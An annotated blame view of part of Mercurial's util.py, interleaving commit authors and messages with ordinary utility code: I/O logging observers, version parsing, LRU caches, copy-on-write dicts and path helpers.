Gregory Szorc
util: add a file object proxy that can notify observers...
r36541 self._writedata(res)
def readline(self, res, limit=-1):
if not self.reads:
return
Gregory Szorc
util: don't log low-level I/O calls for HTTP peer...
r37062 if self.logdataapis:
self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
Gregory Szorc
util: add a file object proxy that can notify observers...
r36541 self._writedata(res)
Gregory Szorc
util: log readinto() I/O...
r36648 def readinto(self, res, dest):
if not self.reads:
return
Gregory Szorc
util: don't log low-level I/O calls for HTTP peer...
r37062 if self.logdataapis:
self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
res))
Gregory Szorc
util: log readinto() I/O...
r36648 data = dest[0:res] if res is not None else b''
Gregory Szorc
util: cast memoryview to bytes...
r41429
# _writedata() uses "in" operator and is confused by memoryview because
# characters are ints on Python 3.
if isinstance(data, memoryview):
data = data.tobytes()
Gregory Szorc
util: log readinto() I/O...
r36648 self._writedata(data)
Gregory Szorc
util: add a file object proxy that can notify observers...
r36541 def write(self, res, data):
if not self.writes:
return
Gregory Szorc
util: report integer result from write()...
r36649 # Python 2 returns None from some write() calls. Python 3 (reasonably)
# returns the integer bytes written.
if res is None and data:
res = len(data)
Gregory Szorc
util: don't log low-level I/O calls for HTTP peer...
r37062 if self.logdataapis:
self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
Gregory Szorc
util: add a file object proxy that can notify observers...
r36541 self._writedata(data)
def flush(self, res):
if not self.writes:
return
self.fh.write('%s> flush() -> %r\n' % (self.name, res))
Gregory Szorc
util: enable observing of util.bufferedinputpipe...
r36542 # For observedbufferedinputpipe.
def bufferedread(self, res, size):
Gregory Szorc
util: don't log low-level I/O calls for HTTP peer...
r37062 if not self.reads:
return
if self.logdataapis:
self.fh.write('%s> bufferedread(%d) -> %d' % (
self.name, size, len(res)))
Gregory Szorc
util: enable observing of util.bufferedinputpipe...
r36542 self._writedata(res)
def bufferedreadline(self, res):
Gregory Szorc
util: don't log low-level I/O calls for HTTP peer...
r37062 if not self.reads:
return
if self.logdataapis:
self.fh.write('%s> bufferedreadline() -> %d' % (
self.name, len(res)))
Gregory Szorc
util: enable observing of util.bufferedinputpipe...
r36542 self._writedata(res)
Gregory Szorc
util: add a file object proxy that can notify observers...
r36541 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
Gregory Szorc
util: don't log low-level I/O calls for HTTP peer...
r37062 logdata=False, logdataapis=True):
Gregory Szorc
util: add a file object proxy that can notify observers...
r36541 """Turn a file object into a logging file object."""
observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
Gregory Szorc
util: don't log low-level I/O calls for HTTP peer...
r37062 logdata=logdata, logdataapis=logdataapis)
Gregory Szorc
util: add a file object proxy that can notify observers...
r36541 return fileobjectproxy(fh, observer)
Gregory Szorc
util: observable proxy objects for sockets...
r37028 class socketobserver(baseproxyobserver):
"""Logs socket activity."""
def __init__(self, fh, name, reads=True, writes=True, states=True,
Gregory Szorc
util: don't log low-level I/O calls for HTTP peer...
r37062 logdata=False, logdataapis=True):
Gregory Szorc
util: observable proxy objects for sockets...
r37028 self.fh = fh
self.name = name
self.reads = reads
self.writes = writes
self.states = states
self.logdata = logdata
Gregory Szorc
util: don't log low-level I/O calls for HTTP peer...
r37062 self.logdataapis = logdataapis
Gregory Szorc
util: observable proxy objects for sockets...
r37028
def makefile(self, res, mode=None, bufsize=None):
if not self.states:
return
self.fh.write('%s> makefile(%r, %r)\n' % (
self.name, mode, bufsize))
def recv(self, res, size, flags=0):
if not self.reads:
return
Gregory Szorc
util: don't log low-level I/O calls for HTTP peer...
r37062 if self.logdataapis:
self.fh.write('%s> recv(%d, %d) -> %d' % (
self.name, size, flags, len(res)))
Gregory Szorc
util: observable proxy objects for sockets...
r37028 self._writedata(res)
def recvfrom(self, res, size, flags=0):
if not self.reads:
return
Gregory Szorc
util: don't log low-level I/O calls for HTTP peer...
r37062 if self.logdataapis:
self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
self.name, size, flags, len(res[0])))
Gregory Szorc
util: observable proxy objects for sockets...
r37028 self._writedata(res[0])
def recvfrom_into(self, res, buf, size, flags=0):
if not self.reads:
return
Gregory Szorc
util: don't log low-level I/O calls for HTTP peer...
r37062 if self.logdataapis:
self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
self.name, size, flags, res[0]))
Gregory Szorc
util: observable proxy objects for sockets...
r37028 self._writedata(buf[0:res[0]])
def recv_into(self, res, buf, size=0, flags=0):
if not self.reads:
return
Gregory Szorc
util: don't log low-level I/O calls for HTTP peer...
r37062 if self.logdataapis:
self.fh.write('%s> recv_into(%d, %d) -> %d' % (
self.name, size, flags, res))
Gregory Szorc
util: observable proxy objects for sockets...
r37028 self._writedata(buf[0:res])
def send(self, res, data, flags=0):
if not self.writes:
return
self.fh.write('%s> send(%d, %d) -> %d' % (
self.name, len(data), flags, len(res)))
self._writedata(data)
def sendall(self, res, data, flags=0):
if not self.writes:
return
Gregory Szorc
util: don't log low-level I/O calls for HTTP peer...
r37062 if self.logdataapis:
# Returns None on success. So don't bother reporting return value.
self.fh.write('%s> sendall(%d, %d)' % (
self.name, len(data), flags))
Gregory Szorc
util: observable proxy objects for sockets...
r37028 self._writedata(data)
def sendto(self, res, data, flagsoraddress, address=None):
if not self.writes:
return
if address:
flags = flagsoraddress
else:
flags = 0
Gregory Szorc
util: don't log low-level I/O calls for HTTP peer...
r37062 if self.logdataapis:
self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
self.name, len(data), flags, address, res))
Gregory Szorc
util: observable proxy objects for sockets...
r37028 self._writedata(data)
def setblocking(self, res, flag):
if not self.states:
return
self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
def settimeout(self, res, value):
if not self.states:
return
self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
def gettimeout(self, res):
if not self.states:
return
self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
Augie Fackler
util: fix signature of setsockopt in socket observer...
r39095 def setsockopt(self, res, level, optname, value):
Gregory Szorc
util: observable proxy objects for sockets...
r37028 if not self.states:
return
self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
Augie Fackler
util: fix signature of setsockopt in socket observer...
r39095 self.name, level, optname, value, res))
Gregory Szorc
util: observable proxy objects for sockets...
r37028
def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
Gregory Szorc
util: don't log low-level I/O calls for HTTP peer...
r37062 logdata=False, logdataapis=True):
Gregory Szorc
util: observable proxy objects for sockets...
r37028 """Turn a socket into a logging socket."""
observer = socketobserver(logh, name, reads=reads, writes=writes,
Gregory Szorc
util: don't log low-level I/O calls for HTTP peer...
r37062 states=states, logdata=logdata,
logdataapis=logdataapis)
Gregory Szorc
util: observable proxy objects for sockets...
r37028 return socketproxy(fh, observer)
Matt Mackall
refactor version code...
r7632 def version():
"""Return version information if available."""
try:
Gregory Szorc
util: use absolute_import
r27358 from . import __version__
Matt Mackall
refactor version code...
r7632 return __version__.version
except ImportError:
return 'unknown'
Gregory Szorc
util: add versiontuple() for returning parsed version information...
r27112 def versiontuple(v=None, n=4):
"""Parses a Mercurial version string into an N-tuple.
The version string to be parsed is specified with the ``v`` argument.
If it isn't defined, the current Mercurial version string will be parsed.
``n`` can be 2, 3, or 4. Here is how some version strings map to
returned values:
Yuya Nishihara
doctest: bulk-replace string literals with b'' for Python 3...
r34133 >>> v = b'3.6.1+190-df9b73d2d444'
Gregory Szorc
util: add versiontuple() for returning parsed version information...
r27112 >>> versiontuple(v, 2)
(3, 6)
>>> versiontuple(v, 3)
(3, 6, 1)
>>> versiontuple(v, 4)
(3, 6, 1, '190-df9b73d2d444')
Yuya Nishihara
doctest: bulk-replace string literals with b'' for Python 3...
r34133 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
Gregory Szorc
util: add versiontuple() for returning parsed version information...
r27112 (3, 6, 1, '190-df9b73d2d444+20151118')
Yuya Nishihara
doctest: bulk-replace string literals with b'' for Python 3...
r34133 >>> v = b'3.6'
Gregory Szorc
util: add versiontuple() for returning parsed version information...
r27112 >>> versiontuple(v, 2)
(3, 6)
>>> versiontuple(v, 3)
(3, 6, None)
>>> versiontuple(v, 4)
(3, 6, None, None)
Gregory Szorc
util: better handle '-' in version string (issue5302)...
r29613
Yuya Nishihara
doctest: bulk-replace string literals with b'' for Python 3...
r34133 >>> v = b'3.9-rc'
Gregory Szorc
util: better handle '-' in version string (issue5302)...
r29613 >>> versiontuple(v, 2)
(3, 9)
>>> versiontuple(v, 3)
(3, 9, None)
>>> versiontuple(v, 4)
(3, 9, None, 'rc')
Yuya Nishihara
doctest: bulk-replace string literals with b'' for Python 3...
r34133 >>> v = b'3.9-rc+2-02a8fea4289b'
Gregory Szorc
util: better handle '-' in version string (issue5302)...
r29613 >>> versiontuple(v, 2)
(3, 9)
>>> versiontuple(v, 3)
(3, 9, None)
>>> versiontuple(v, 4)
(3, 9, None, 'rc+2-02a8fea4289b')
Yuya Nishihara
version: make parser more robust for rc variants and ill-formed strings
r37819
>>> versiontuple(b'4.6rc0')
(4, 6, None, 'rc0')
>>> versiontuple(b'4.6rc0+12-425d55e54f98')
(4, 6, None, 'rc0+12-425d55e54f98')
>>> versiontuple(b'.1.2.3')
(None, None, None, '.1.2.3')
>>> versiontuple(b'12.34..5')
(12, 34, None, '..5')
>>> versiontuple(b'1.2.3.4.5.6')
(1, 2, 3, '.4.5.6')
Gregory Szorc
util: add versiontuple() for returning parsed version information...
r27112 """
if not v:
v = version()
Yuya Nishihara
version: make parser more robust for rc variants and ill-formed strings
r37819 m = remod.match(br'(\d+(?:\.\d+){,2})[\+-]?(.*)', v)
if not m:
vparts, extra = '', v
elif m.group(2):
vparts, extra = m.groups()
Gregory Szorc
util: add versiontuple() for returning parsed version information...
r27112 else:
Yuya Nishihara
version: make parser more robust for rc variants and ill-formed strings
r37819 vparts, extra = m.group(1), None
Gregory Szorc
util: add versiontuple() for returning parsed version information...
r27112
vints = []
for i in vparts.split('.'):
try:
vints.append(int(i))
except ValueError:
break
# (3, 6) -> (3, 6, None)
while len(vints) < 3:
vints.append(None)
if n == 2:
return (vints[0], vints[1])
if n == 3:
return (vints[0], vints[1], vints[2])
if n == 4:
return (vints[0], vints[1], vints[2], extra)
Brendan Cully
Add cachefunc to abstract function call cache
r3145 def cachefunc(func):
'''cache the result of function calls'''
Benoit Boissinot
add comments in cachefunc
r3147 # XXX doesn't handle keywords args
timeless
util: use __code__ (available since py2.6)
r28832 if func.__code__.co_argcount == 0:
FUJIWARA Katsunori
util: add the code path to "cachefunc()" for the function taking no arguments...
r20835 cache = []
def f():
if len(cache) == 0:
cache.append(func())
return cache[0]
return f
Brendan Cully
Add cachefunc to abstract function call cache
r3145 cache = {}
timeless
util: use __code__ (available since py2.6)
r28832 if func.__code__.co_argcount == 1:
Benoit Boissinot
add comments in cachefunc
r3147 # we gain a small amount of time because
# we don't need to pack/unpack the list
Brendan Cully
Add cachefunc to abstract function call cache
r3145 def f(arg):
if arg not in cache:
cache[arg] = func(arg)
return cache[arg]
else:
def f(*args):
if args not in cache:
cache[args] = func(*args)
return cache[args]
return f
Jun Wu
config: use copy-on-write to improve copy performance...
r34353 class cow(object):
"""helper class to make copy-on-write easier
Call preparewrite before doing any writes.
"""
def preparewrite(self):
"""call this before writes, return self or a copied new object"""
if getattr(self, '_copied', 0):
self._copied -= 1
return self.__class__(self)
return self
def copy(self):
"""always do a cheap copy"""
self._copied = getattr(self, '_copied', 0) + 1
return self
Martin von Zweigbergk
util: rewrite sortdict using Python 2.7's OrderedDict...
r32300 class sortdict(collections.OrderedDict):
Yuya Nishihara
util: drop unneeded override, sortdict.copy()...
r32306 '''a simple sorted dictionary
Yuya Nishihara
doctest: bulk-replace string literals with b'' for Python 3...
r34133 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
Yuya Nishihara
util: drop unneeded override, sortdict.copy()...
r32306 >>> d2 = d1.copy()
>>> d2
sortdict([('a', 0), ('b', 1)])
Yuya Nishihara
doctest: bulk-replace string literals with b'' for Python 3...
r34133 >>> d2.update([(b'a', 2)])
Yuya Nishihara
doctest: coerce dict.keys() to list...
r34141 >>> list(d2.keys()) # should still be in last-set order
Yuya Nishihara
util: drop unneeded override, sortdict.copy()...
r32306 ['b', 'a']
'''
Martin von Zweigbergk
util: rewrite sortdict using Python 2.7's OrderedDict...
r32300 def __setitem__(self, key, value):
Angel Ezquerra
config: move config.sortdict class into util...
r21813 if key in self:
Martin von Zweigbergk
util: rewrite sortdict using Python 2.7's OrderedDict...
r32300 del self[key]
super(sortdict, self).__setitem__(key, value)
Angel Ezquerra
config: move config.sortdict class into util...
r21813
Yuya Nishihara
util: fix sortdict.update() to call __setitem__() on PyPy (issue5639)...
r33628 if pycompat.ispypy:
# __setitem__() isn't called as of PyPy 5.8.0
def update(self, src):
if isinstance(src, dict):
src = src.iteritems()
for k, v in src:
self[k] = v
Jun Wu
config: use copy-on-write to improve copy performance...
r34353 class cowdict(cow, dict):
"""copy-on-write dict
Be sure to call d = d.preparewrite() before writing to d.
>>> a = cowdict()
>>> a is a.preparewrite()
True
>>> b = a.copy()
>>> b is a
True
>>> c = b.copy()
>>> c is a
True
>>> a = a.preparewrite()
>>> b is a
False
>>> a is a.preparewrite()
True
>>> c = c.preparewrite()
>>> b is c
False
>>> b is b.preparewrite()
True
"""
class cowsortdict(cow, sortdict):
"""copy-on-write sortdict
Be sure to call d = d.preparewrite() before writing to d.
"""
Martin von Zweigbergk
util: add base class for transactional context managers...
r33790 class transactional(object):
"""Base class for making a transactional type into a context manager."""
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
def close(self):
"""Successfully closes the transaction."""
@abc.abstractmethod
def release(self):
"""Marks the end of the transaction.
If the transaction has not been closed, it will be aborted.
"""
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
try:
if exc_type is None:
self.close()
finally:
self.release()
Martin von Zweigbergk
histedit: extract InterventionRequired transaction handling to utils...
r33446 @contextlib.contextmanager
def acceptintervention(tr=None):
"""A context manager that closes the transaction on InterventionRequired
If no transaction was provided, this simply runs the body and returns
"""
if not tr:
yield
return
try:
yield
tr.close()
except error.InterventionRequired:
tr.close()
raise
finally:
tr.release()
Durham Goode
rebase: use one dirstateguard for when using rebase.singletransaction...
r33621 @contextlib.contextmanager
def nullcontextmanager():
yield
Gregory Szorc
util: reimplement lrucachedict...
r27371 class _lrucachenode(object):
"""A node in a doubly linked list.
Holds a reference to nodes on either side as well as a key-value
pair for the dictionary entry.
"""
Gregory Szorc
util: allow lrucachedict to track cost of entries...
r39603 __slots__ = (u'next', u'prev', u'key', u'value', u'cost')
Gregory Szorc
util: reimplement lrucachedict...
r27371
def __init__(self):
self.next = None
self.prev = None
self.key = _notset
self.value = None
Gregory Szorc
util: allow lrucachedict to track cost of entries...
r39603 self.cost = 0
Gregory Szorc
util: reimplement lrucachedict...
r27371
def markempty(self):
"""Mark the node as emptied."""
self.key = _notset
Gregory Szorc
util: allow lrucachedict to track cost of entries...
r39603 self.value = None
self.cost = 0
Gregory Szorc
util: reimplement lrucachedict...
r27371
Siddharth Agarwal
util: add an LRU cache dict...
r18603 class lrucachedict(object):
Gregory Szorc
util: reimplement lrucachedict...
r27371 """Dict that caches most recent accesses and sets.
The dict consists of an actual backing dict - indexed by original
key - and a doubly linked circular list defining the order of entries in
the cache.
The head node is the newest entry in the cache. If the cache is full,
we recycle head.prev and make it the new head. Cache accesses result in
the node being moved to before the existing head and being marked as the
new head node.
Gregory Szorc
util: allow lrucachedict to track cost of entries...
r39603
Items in the cache can be inserted with an optional "cost" value. This is
simply an integer that is specified by the caller. The cache can be queried
for the total cost of all items presently in the cache.
Gregory Szorc
util: teach lrucachedict to enforce a max total cost...
r39604
The cache can also define a maximum cost. If a cache insertion would
cause the total cost of the cache to go beyond the maximum cost limit,
nodes will be evicted to make room for the new code. This can be used
to e.g. set a max memory limit and associate an estimated bytes size
cost to each item in the cache. By default, no maximum cost is enforced.
Gregory Szorc
util: reimplement lrucachedict...
r27371 """
Gregory Szorc
util: teach lrucachedict to enforce a max total cost...
r39604 def __init__(self, max, maxcost=0):
Siddharth Agarwal
util: add an LRU cache dict...
r18603 self._cache = {}
Gregory Szorc
util: reimplement lrucachedict...
r27371
self._head = head = _lrucachenode()
head.prev = head
head.next = head
self._size = 1
Gregory Szorc
util: make capacity a public attribute on lrucachedict...
r39600 self.capacity = max
Gregory Szorc
util: allow lrucachedict to track cost of entries...
r39603 self.totalcost = 0
Gregory Szorc
util: teach lrucachedict to enforce a max total cost...
r39604 self.maxcost = maxcost
Gregory Szorc
util: reimplement lrucachedict...
r27371
def __len__(self):
return len(self._cache)
def __contains__(self, k):
return k in self._cache
Siddharth Agarwal
util: add an LRU cache dict...
r18603
Gregory Szorc
util: reimplement lrucachedict...
r27371 def __iter__(self):
# We don't have to iterate in cache order, but why not.
n = self._head
for i in range(len(self._cache)):
yield n.key
n = n.next
def __getitem__(self, k):
node = self._cache[k]
self._movetohead(node)
return node.value
Gregory Szorc
util: allow lrucachedict to track cost of entries...
r39603 def insert(self, k, v, cost=0):
"""Insert a new item in the cache with optional cost value."""
Gregory Szorc
util: reimplement lrucachedict...
r27371 node = self._cache.get(k)
# Replace existing value and mark as newest.
if node is not None:
Gregory Szorc
util: allow lrucachedict to track cost of entries...
r39603 self.totalcost -= node.cost
Gregory Szorc
util: reimplement lrucachedict...
r27371 node.value = v
Gregory Szorc
util: allow lrucachedict to track cost of entries...
r39603 node.cost = cost
self.totalcost += cost
Gregory Szorc
util: reimplement lrucachedict...
r27371 self._movetohead(node)
Gregory Szorc
util: teach lrucachedict to enforce a max total cost...
r39604
if self.maxcost:
self._enforcecostlimit()
Gregory Szorc
util: reimplement lrucachedict...
r27371 return
Gregory Szorc
util: make capacity a public attribute on lrucachedict...
r39600 if self._size < self.capacity:
Gregory Szorc
util: reimplement lrucachedict...
r27371 node = self._addcapacity()
else:
# Grab the last/oldest item.
node = self._head.prev
Siddharth Agarwal
util: add an LRU cache dict...
r18603
Gregory Szorc
util: reimplement lrucachedict...
r27371 # At capacity. Kill the old entry.
if node.key is not _notset:
Gregory Szorc
util: allow lrucachedict to track cost of entries...
r39603 self.totalcost -= node.cost
Gregory Szorc
util: reimplement lrucachedict...
r27371 del self._cache[node.key]
node.key = k
node.value = v
Gregory Szorc
util: allow lrucachedict to track cost of entries...
r39603 node.cost = cost
self.totalcost += cost
Gregory Szorc
util: reimplement lrucachedict...
r27371 self._cache[k] = node
# And mark it as newest entry. No need to adjust order since it
# is already self._head.prev.
self._head = node
Siddharth Agarwal
util: add an LRU cache dict...
r18603
Gregory Szorc
util: teach lrucachedict to enforce a max total cost...
r39604 if self.maxcost:
self._enforcecostlimit()
Gregory Szorc
util: allow lrucachedict to track cost of entries...
r39603 def __setitem__(self, k, v):
self.insert(k, v)
Gregory Szorc
util: reimplement lrucachedict...
r27371 def __delitem__(self, k):
Yuya Nishihara
util: implement pop() on lrucachedict...
r40916 self.pop(k)
def pop(self, k, default=_notset):
try:
node = self._cache.pop(k)
except KeyError:
if default is _notset:
raise
return default
value = node.value
Gregory Szorc
util: allow lrucachedict to track cost of entries...
r39603 self.totalcost -= node.cost
Gregory Szorc
util: reimplement lrucachedict...
r27371 node.markempty()
# Temporarily mark as newest item before re-adjusting head to make
# this node the oldest item.
self._movetohead(node)
self._head = node.next
Yuya Nishihara
util: implement pop() on lrucachedict...
r40916 return value
Gregory Szorc
util: reimplement lrucachedict...
r27371 # Additional dict methods.
def get(self, k, default=None):
try:
Gregory Szorc
util: update lrucachedict order during get()...
r39607 return self.__getitem__(k)
Gregory Szorc
util: reimplement lrucachedict...
r27371 except KeyError:
return default
Siddharth Agarwal
util: add an LRU cache dict...
r18603
Yuya Nishihara
util: add method to peek item in lrucachedict...
r40915 def peek(self, k, default=_notset):
"""Get the specified item without moving it to the head
Unlike get(), this doesn't mutate the internal state. But be aware
that it doesn't mean peek() is thread safe.
"""
try:
node = self._cache[k]
return node.value
except KeyError:
if default is _notset:
raise
return default
Siddharth Agarwal
lrucachedict: implement clear()
r19710 def clear(self):
Gregory Szorc
util: reimplement lrucachedict...
r27371 n = self._head
while n.key is not _notset:
Gregory Szorc
util: allow lrucachedict to track cost of entries...
r39603 self.totalcost -= n.cost
Gregory Szorc
util: reimplement lrucachedict...
r27371 n.markempty()
n = n.next
Siddharth Agarwal
lrucachedict: implement clear()
r19710 self._cache.clear()
Gregory Szorc
util: reimplement lrucachedict...
r27371
Gregory Szorc
util: teach lrucachedict to enforce a max total cost...
r39604 def copy(self, capacity=None, maxcost=0):
Gregory Szorc
util: ability to change capacity when copying lrucachedict...
r39601 """Create a new cache as a copy of the current one.
By default, the new cache has the same capacity as the existing one.
But, the cache capacity can be changed as part of performing the
copy.
Items in the copy have an insertion/access order matching this
instance.
"""
capacity = capacity or self.capacity
Gregory Szorc
util: teach lrucachedict to enforce a max total cost...
r39604 maxcost = maxcost or self.maxcost
result = lrucachedict(capacity, maxcost=maxcost)
Gregory Szorc
util: properly copy lrucachedict instances...
r39599
# We copy entries by iterating in oldest-to-newest order so the copy
# has the correct ordering.
# Find the first non-empty entry.
Eric Sumner
lrucachedict: add copy method...
r27576 n = self._head.prev
Gregory Szorc
util: properly copy lrucachedict instances...
r39599 while n.key is _notset and n is not self._head:
n = n.prev
Gregory Szorc
util: ability to change capacity when copying lrucachedict...
r39601 # We could potentially skip the first N items when decreasing capacity.
# But let's keep it simple unless it is a performance problem.
Eric Sumner
lrucachedict: add copy method...
r27576 for i in range(len(self._cache)):
Gregory Szorc
util: allow lrucachedict to track cost of entries...
r39603 result.insert(n.key, n.value, cost=n.cost)
Eric Sumner
lrucachedict: add copy method...
r27576 n = n.prev
Gregory Szorc
util: properly copy lrucachedict instances...
r39599
Eric Sumner
lrucachedict: add copy method...
r27576 return result
Gregory Szorc
util: add a popoldest() method to lrucachedict...
r39602 def popoldest(self):
"""Remove the oldest item from the cache.
Returns the (key, value) describing the removed cache entry.
"""
if not self._cache:
return
# Walk the linked list backwards starting at tail node until we hit
# a non-empty node.
n = self._head.prev
while n.key is _notset:
n = n.prev
key, value = n.key, n.value
# And remove it from the cache and mark it as empty.
del self._cache[n.key]
Gregory Szorc
util: allow lrucachedict to track cost of entries...
r39603 self.totalcost -= n.cost
Gregory Szorc
util: add a popoldest() method to lrucachedict...
r39602 n.markempty()
return key, value
Gregory Szorc
util: reimplement lrucachedict...
r27371 def _movetohead(self, node):
"""Mark a node as the newest, making it the new head.
When a node is accessed, it becomes the freshest entry in the LRU
list, which is denoted by self._head.
Visually, let's make ``N`` the new head node (* denotes head):
previous/oldest <-> head <-> next/next newest
----<->--- A* ---<->-----
| |
E <-> D <-> N <-> C <-> B
To:
----<->--- N* ---<->-----
| |
E <-> D <-> C <-> B <-> A
This requires the following moves:
C.next = D (node.prev.next = node.next)
D.prev = C (node.next.prev = node.prev)
E.next = N (head.prev.next = node)
N.prev = E (node.prev = head.prev)
N.next = A (node.next = head)
A.prev = N (head.prev = node)
"""
head = self._head
# C.next = D
node.prev.next = node.next
# D.prev = C
node.next.prev = node.prev
# N.prev = E
node.prev = head.prev
# N.next = A
# It is tempting to do just "head" here, however if node is
# adjacent to head, this will do bad things.
node.next = head.prev.next
# E.next = N
node.next.prev = node
# A.prev = N
node.prev.next = node
self._head = node
def _addcapacity(self):
"""Add a node to the circular linked list.
The new node is inserted before the head node.
"""
head = self._head
node = _lrucachenode()
head.prev.next = node
node.prev = head.prev
node.next = head
head.prev = node
self._size += 1
return node
Siddharth Agarwal
lrucachedict: implement clear()
r19710
Gregory Szorc
util: teach lrucachedict to enforce a max total cost...
r39604 def _enforcecostlimit(self):
# This should run after an insertion. It should only be called if total
# cost limits are being enforced.
# The most recently inserted node is never evicted.
Gregory Szorc
util: optimize cost auditing on insert...
r39605 if len(self) <= 1 or self.totalcost <= self.maxcost:
return
# This is logically equivalent to calling popoldest() until we
# free up enough cost. We don't do that since popoldest() needs
# to walk the linked list and doing this in a loop would be
# quadratic. So we find the first non-empty node and then
# walk nodes until we free up enough capacity.
Gregory Szorc
util: lower water mark when removing nodes after cost limit reached...
r39606 #
# If we only removed the minimum number of nodes to free enough
# cost at insert time, chances are high that the next insert would
# also require pruning. This would effectively constitute quadratic
# behavior for insert-heavy workloads. To mitigate this, we set a
# target cost that is a percentage of the max cost. This will tend
# to free more nodes when the high water mark is reached, which
# lowers the chances of needing to prune on the subsequent insert.
targetcost = int(self.maxcost * 0.75)
Gregory Szorc
util: optimize cost auditing on insert...
r39605 n = self._head.prev
while n.key is _notset:
n = n.prev
Gregory Szorc
util: lower water mark when removing nodes after cost limit reached...
r39606 while len(self) > 1 and self.totalcost > targetcost:
Gregory Szorc
util: optimize cost auditing on insert...
r39605 del self._cache[n.key]
self.totalcost -= n.cost
n.markempty()
n = n.prev
Gregory Szorc
util: teach lrucachedict to enforce a max total cost...
r39604
Matt Mackall
fix memory usage of revlog caches by limiting cache size [issue1639]
r9097 def lrucachefunc(func):
'''cache most recent results of function calls'''
cache = {}
Martin von Zweigbergk
util: drop alias for collections.deque...
r25113 order = collections.deque()
timeless
util: use __code__ (available since py2.6)
r28832 if func.__code__.co_argcount == 1:
Matt Mackall
fix memory usage of revlog caches by limiting cache size [issue1639]
r9097 def f(arg):
if arg not in cache:
if len(cache) > 20:
Bryan O'Sullivan
cleanup: use the deque type where appropriate...
r16803 del cache[order.popleft()]
Matt Mackall
fix memory usage of revlog caches by limiting cache size [issue1639]
r9097 cache[arg] = func(arg)
else:
order.remove(arg)
order.append(arg)
return cache[arg]
else:
def f(*args):
if args not in cache:
if len(cache) > 20:
Bryan O'Sullivan
cleanup: use the deque type where appropriate...
r16803 del cache[order.popleft()]
Matt Mackall
fix memory usage of revlog caches by limiting cache size [issue1639]
r9097 cache[args] = func(*args)
else:
order.remove(args)
order.append(args)
return cache[args]
return f
Matt Mackall
util: take propertycache from context.py
r8207 class propertycache(object):
def __init__(self, func):
self.func = func
self.name = func.__name__
def __get__(self, obj, type=None):
result = self.func(obj)
Pierre-Yves David
clfilter: add a propertycache that must be unfiltered...
r18013 self.cachevalue(obj, result)
Matt Mackall
util: take propertycache from context.py
r8207 return result
Pierre-Yves David
clfilter: add a propertycache that must be unfiltered...
r18013 def cachevalue(self, obj, value):
Mads Kiilerich
spelling: random spell checker fixes
r19951 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
Pierre-Yves David
repoview: make propertycache.setcache compatible with repoview...
r19845 obj.__dict__[self.name] = value
Pierre-Yves David
clfilter: add a propertycache that must be unfiltered...
r18013
Mark Thomas
util: add util.clearcachedproperty...
r35021 def clearcachedproperty(obj, prop):
'''clear a cached property value, if one has been set'''
Yuya Nishihara
py3: cast attribute name to sysstr in clearcachedproperty()
r40725 prop = pycompat.sysstr(prop)
Mark Thomas
util: add util.clearcachedproperty...
r35021 if prop in obj.__dict__:
del obj.__dict__[prop]
Brendan Cully
templater: return data in increasing chunk sizes...
r7396 def increasingchunks(source, min=1024, max=65536):
'''return no less than min bytes per chunk while data remains,
doubling min after each chunk until it reaches max'''
def log2(x):
if not x:
return 0
i = 0
while x:
x >>= 1
i += 1
return i - 1
buf = []
blen = 0
for chunk in source:
buf.append(chunk)
blen += len(chunk)
if blen >= min:
if min < max:
min = min << 1
nmin = 1 << log2(blen)
if nmin > min:
min = nmin
if min > max:
min = max
yield ''.join(buf)
blen = 0
buf = []
if buf:
yield ''.join(buf)
Matt Mackall
many, many trivial check-code fixups
r10282 def always(fn):
return True
def never(fn):
return False
Bryan O'Sullivan
Get add and locate to use new repo and dirstate walk code....
r724
Pierre-Yves David
util: add a 'nogc' decorator to disable the garbage collection...
r23495 def nogc(func):
"""disable garbage collector
Python's garbage collector triggers a GC each time a certain number of
container objects (the number being defined by gc.get_threshold()) are
allocated even when marked not to be tracked by the collector. Tracking has
no effect on when GCs are triggered, only on what objects the GC looks
Mads Kiilerich
spelling: fixes from proofreading of spell checker issues
r23543 into. As a workaround, disable GC while building complex (huge)
Pierre-Yves David
util: add a 'nogc' decorator to disable the garbage collection...
r23495 containers.
Jun Wu
util: make nogc effective for CPython...
r33796 This garbage collector issue have been fixed in 2.7. But it still affect
CPython's performance.
Pierre-Yves David
util: add a 'nogc' decorator to disable the garbage collection...
r23495 """
def wrapper(*args, **kwargs):
gcenabled = gc.isenabled()
gc.disable()
try:
return func(*args, **kwargs)
finally:
if gcenabled:
gc.enable()
return wrapper
Jun Wu
util: make nogc effective for CPython...
r33796 if pycompat.ispypy:
# PyPy runs slower with gc disabled
nogc = lambda x: x
Alexis S. L. Carvalho
pass repo.root to util.pathto() in preparation for the next patch
r4229 def pathto(root, n1, n2):
Bryan O'Sullivan
Fix walk path handling on Windows
r886 '''return the relative path from one place to another.
Alexis S. L. Carvalho
pass repo.root to util.pathto() in preparation for the next patch
r4229 root should use os.sep to separate directories
Alexis S. L. Carvalho
fix util.pathto...
r3669 n1 should use os.sep to separate directories
n2 should use "/" to separate directories
returns an os.sep-separated path.
Alexis S. L. Carvalho
pass repo.root to util.pathto() in preparation for the next patch
r4229
If n1 is a relative path, it's assumed it's
relative to root.
n2 should always be relative to root.
Alexis S. L. Carvalho
fix util.pathto...
r3669 '''
Matt Mackall
many, many trivial check-code fixups
r10282 if not n1:
return localpath(n2)
Alexis S. L. Carvalho
Fix handling of paths when run outside the repo....
r4230 if os.path.isabs(n1):
if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
return os.path.join(root, localpath(n2))
n2 = '/'.join((pconvert(root), n2))
Shun-ichi GOTO
Add util.splitpath() and use it instead of using os.sep directly....
r5844 a, b = splitpath(n1), n2.split('/')
